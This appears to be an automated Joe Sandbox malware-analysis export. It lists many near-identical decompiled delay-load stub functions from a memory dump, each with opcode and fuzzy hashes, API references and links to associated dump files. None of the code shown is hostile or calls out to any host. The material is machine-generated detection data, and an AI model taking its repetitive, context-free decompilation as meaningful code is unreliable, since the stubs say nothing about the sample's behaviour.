Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: debb3482199948e6dfb6e6b04b0cd3c04547dff95d788946d2f39e6c63b0f82a
Instruction ID: 6ec8424edae02a78a0a8894e5e12e5d0f01ca656711cf32a71bfbe91e10712d5
Opcode Fuzzy Hash: debb3482199948e6dfb6e6b04b0cd3c04547dff95d788946d2f39e6c63b0f82a
Instruction Fuzzy Hash: 04B012A1A6D1016C31887204BD12E3E062CCFC0B20330C12FF54ED41C1E8486C445436

Uniqueness

Uniqueness Score: -1.00%

Function 0007D8F2 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0007D8F2() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0007DF59(_t3, _t4, _t8, _t9, _t10, 0x9bdc4, 0xc2144); // executed
				goto __eax;
			}

0x0007d89b
0x0007d8a3
0x0007d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007D8A3

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 53b73369501398a2423acb43ce74bdd9eaf0a90660ffc9be3cb67f0117c041f8
Instruction ID: 55a607656a12e62c468f6ccb4ca326618c9e9234a13eb99cf53c38e65a041e2f
Opcode Fuzzy Hash: 53b73369501398a2423acb43ce74bdd9eaf0a90660ffc9be3cb67f0117c041f8
Instruction Fuzzy Hash: D8B012A1A6D0016C314C7205BE12E3E062CCFC0B20330C02FF54ED41C1E8886D055436

Uniqueness

Uniqueness Score: -1.00%

Function 0007D8FC Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0007D8FC() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0007DF59(_t3, _t4, _t8, _t9, _t10, 0x9bdc4, 0xc2140); // executed
				goto __eax;
			}

0x0007d89b
0x0007d8a3
0x0007d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007D8A3

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 493be66c8223e0c9292fe4631ffb35d7b93e63eaa730583b17977f8dabbfc299
Instruction ID: 0c5a7ccec500da32a8fd370c1d1428d3c3fea5f7d5238b733ffae707f07433c0
Opcode Fuzzy Hash: 493be66c8223e0c9292fe4631ffb35d7b93e63eaa730583b17977f8dabbfc299
Instruction Fuzzy Hash: 7EB012A1A6D0016C314C7205BD12E3E062CCFC0B20330C02FF54ED41C1EC486C045436

Uniqueness

Uniqueness Score: -1.00%

Function 0007D906 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0007D906() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0007DF59(_t3, _t4, _t8, _t9, _t10, 0x9bdc4, 0xc213c); // executed
				goto __eax;
			}

0x0007d89b
0x0007d8a3
0x0007d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007D8A3

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 213145382f1cb05f81275e5875c0eb51cf7f88207ce0f496ccdba9844d3f0283
Instruction ID: bc3a6b17a8704ae699ec2743e6a19cbb2deec037bdbdbbb3ce2a43ece5b41df5
Opcode Fuzzy Hash: 213145382f1cb05f81275e5875c0eb51cf7f88207ce0f496ccdba9844d3f0283
Instruction Fuzzy Hash: 44B01291AAE1016C3148A204BD12E3E062DCFC1B20330C02FF94ED41C1E8486C045436

Uniqueness

Uniqueness Score: -1.00%

Function 0007D910 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0007D910() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0007DF59(_t3, _t4, _t8, _t9, _t10, 0x9bdc4, 0xc2138); // executed
				goto __eax;
			}

0x0007d89b
0x0007d8a3
0x0007d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007D8A3

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5abb68aa1dd37115e58ab53dd0fc1f342b72c124328647b05cc2d0bbebf0e7eb
Instruction ID: 04062053e8fb69279941ceb50caf1eff4c218054514693d583b42fbffe8ea1e5
Opcode Fuzzy Hash: 5abb68aa1dd37115e58ab53dd0fc1f342b72c124328647b05cc2d0bbebf0e7eb
Instruction Fuzzy Hash: BBB012A1A6E1016C3188A304BD12E3E062DCFC0B20330C12FF54ED41C1E848AC445436

Uniqueness

Uniqueness Score: -1.00%

Function 0007D924 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0007D924() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0007DF59(_t3, _t4, _t8, _t9, _t10, 0x9bdc4, 0xc2130); // executed
				goto __eax;
			}

0x0007d89b
0x0007d8a3
0x0007d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007D8A3

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c88e535df4c2457618e950bcb476e18d2de77abe2d6dd0d42604b4e810554130
Instruction ID: 8a0432d05b72ed4ccd0234948bd75a28adf2ee6ec08c39211939a3f2323724dd
Opcode Fuzzy Hash: c88e535df4c2457618e950bcb476e18d2de77abe2d6dd0d42604b4e810554130
Instruction Fuzzy Hash: 05B01291A7E4016C3148A204BD12E3E066DCFC0B20330C02FF54ED41C1EC486C045436

Uniqueness

Uniqueness Score: -1.00%

Function 0007D92E Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0007D92E() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0007DF59(_t3, _t4, _t8, _t9, _t10, 0x9bdc4, 0xc212c); // executed
				goto __eax;
			}

0x0007d89b
0x0007d8a3
0x0007d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007D8A3

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: aa64d3632437753ba73ad8a300dd0dc5f2245b3d495c7d887561f1baf41ff4d3
Instruction ID: 4bd83668e9e3e9c0b416cec7a00be9f349b6d85f67a55ea8a6d272be7a9d4388
Opcode Fuzzy Hash: aa64d3632437753ba73ad8a300dd0dc5f2245b3d495c7d887561f1baf41ff4d3
Instruction Fuzzy Hash: AEB01291A6D101AC31486214BD12E3E066CCFC1B20330C02FFA4ED41C1E9486C045436

Uniqueness

Uniqueness Score: -1.00%

Function 0007D942 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0007D942() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0007DF59(_t3, _t4, _t8, _t9, _t10, 0x9bdc4, 0xc2124); // executed
				goto __eax;
			}

0x0007d89b
0x0007d8a3
0x0007d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007D8A3

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 415b60d10eab1a1f23e7bc45eff655b0e7fd612339324943de948c349a1b3491
Instruction ID: e921a0251001f19eb4155d448817d9058a01ff47e206e38bbcfb2041ff328db9
Opcode Fuzzy Hash: 415b60d10eab1a1f23e7bc45eff655b0e7fd612339324943de948c349a1b3491
Instruction Fuzzy Hash: 4BB012E1A6D001AC314C6205BE12E3E06ACCFC0B20330C02FF54ED41C1E8886C055436

Uniqueness

Uniqueness Score: -1.00%

Function 0007E1F9 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0007E1F9() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0007DF59(_t3, _t4, _t8, _t9, _t10, 0x9bea4, 0xc2034); // executed
				goto __eax;
			}

0x0007e203
0x0007e20b
0x0007e212

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007E20B

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e6ca206f9a6e23191e3a60140995a4bcab485b84fdb6fdafa4724c56aa455dcd
Instruction ID: 79c4f439ed4c2d93447ff709b04beacf8b49beb1eab4b908de9022eac697afe4
Opcode Fuzzy Hash: e6ca206f9a6e23191e3a60140995a4bcab485b84fdb6fdafa4724c56aa455dcd
Instruction Fuzzy Hash: 49B01291A6F0017D320C5200FF06D7E032CCBC0B60330C02FF20ED808395884C065036

Uniqueness

Uniqueness Score: -1.00%

Function 0007DACF Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0007DACF() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0007DF59(_t3, _t4, _t8, _t9, _t10, 0x9bde4, 0xc204c); // executed
				goto __eax;
			}

0x0007daaa
0x0007dab2
0x0007dab9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007DAB2

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6a25dc7396921fd9626650845433701f657c3741fcd7dec6ce7c94b040b13229
Instruction ID: 787d382c81a4f99062e592eb7dc9a296ae625c4967170d7657cfabe915b97e0c
Opcode Fuzzy Hash: 6a25dc7396921fd9626650845433701f657c3741fcd7dec6ce7c94b040b13229
Instruction Fuzzy Hash: A0B012A266D101BC31087205BE02E3E026CCBC0B20330C12FF50EC8046E44C8C049436

Uniqueness

Uniqueness Score: -1.00%

Function 0007DAD9 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0007DAD9() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0007DF59(_t3, _t4, _t8, _t9, _t10, 0x9bde4, 0xc2050); // executed
				goto __eax;
			}

0x0007daaa
0x0007dab2
0x0007dab9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007DAB2

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 20b2456c9879335f94fe30e9e31c1ad7d6c61e6120084f9a257a439e6ddbbc6a
Instruction ID: 4a3b20163dfd33799bd0331a35742fa645019595e8541da0023cd31871ba5237
Opcode Fuzzy Hash: 20b2456c9879335f94fe30e9e31c1ad7d6c61e6120084f9a257a439e6ddbbc6a
Instruction Fuzzy Hash: 67B0129166D0017C31087205BE02F3E026CDBC4B20330C53FF10FC8046E84C8C09983A

Uniqueness

Uniqueness Score: -1.00%

Function 0007DB01 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0007DB01() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0007DF59(_t3, _t4, _t8, _t9, _t10, 0x9bde4, 0xc2060); // executed
				goto __eax;
			}

0x0007daaa
0x0007dab2
0x0007dab9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007DAB2

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5af4c52430fcf3e267540404ab456cced2df7865aa88afcc7503ce51f5d94d8d
Instruction ID: 9acc142257c8eb5f003e6c69a23d2ea90414bb46a164908a8bc1506a494564c2
Opcode Fuzzy Hash: 5af4c52430fcf3e267540404ab456cced2df7865aa88afcc7503ce51f5d94d8d
Instruction Fuzzy Hash: 97B012D16AD1017C31087205BE02F3E026CEBC0B20330C12FF40EC8046E84C8C149536

Uniqueness

Uniqueness Score: -1.00%

Function 0007DBC3 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0007DBC3() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0007DF59(_t3, _t4, _t8, _t9, _t10, 0x9be44, 0xc2088); // executed
				goto __eax;
			}

0x0007dbcd
0x0007dbd5
0x0007dbdc

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007DBD5

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 61f9383f230f06d6a8fa63c6fd11015be76664a8b8a41c86786961a43723af51
Instruction ID: f4d6a9cadc6c6833496f042d5ddc1443a63366ab67b581bdeeaf103fbe8d4892
Opcode Fuzzy Hash: 61f9383f230f06d6a8fa63c6fd11015be76664a8b8a41c86786961a43723af51
Instruction Fuzzy Hash: C2B0129577C106BD320812007D07D7F123CDBC0B20330C13FF10ED40829A484C485035

Uniqueness

Uniqueness Score: -1.00%

Function 0007DBDE Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0007DBDE() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0007DF59(_t3, _t4, _t8, _t9, _t10, 0x9be44, 0xc2090); // executed
				goto __eax;
			}

0x0007dbcd
0x0007dbd5
0x0007dbdc

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007DBD5

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a7087ec518c9f2044455659193d143dfadb96ae26fc61a769dadca2c18f7c01a
Instruction ID: 8035778121ca5439ed4269083c1ca6fa817fd313c16f7a972b28e1c8038f2192
Opcode Fuzzy Hash: a7087ec518c9f2044455659193d143dfadb96ae26fc61a769dadca2c18f7c01a
Instruction Fuzzy Hash: ECB09295668001AD210862147906E7A122DDB80B20330802FB10EC44429A484C485035

Uniqueness

Uniqueness Score: -1.00%

Function 0007DBE8 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0007DBE8() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0007DF59(_t3, _t4, _t8, _t9, _t10, 0x9be44, 0xc208c); // executed
				goto __eax;
			}

0x0007dbcd
0x0007dbd5
0x0007dbdc

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007DBD5

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

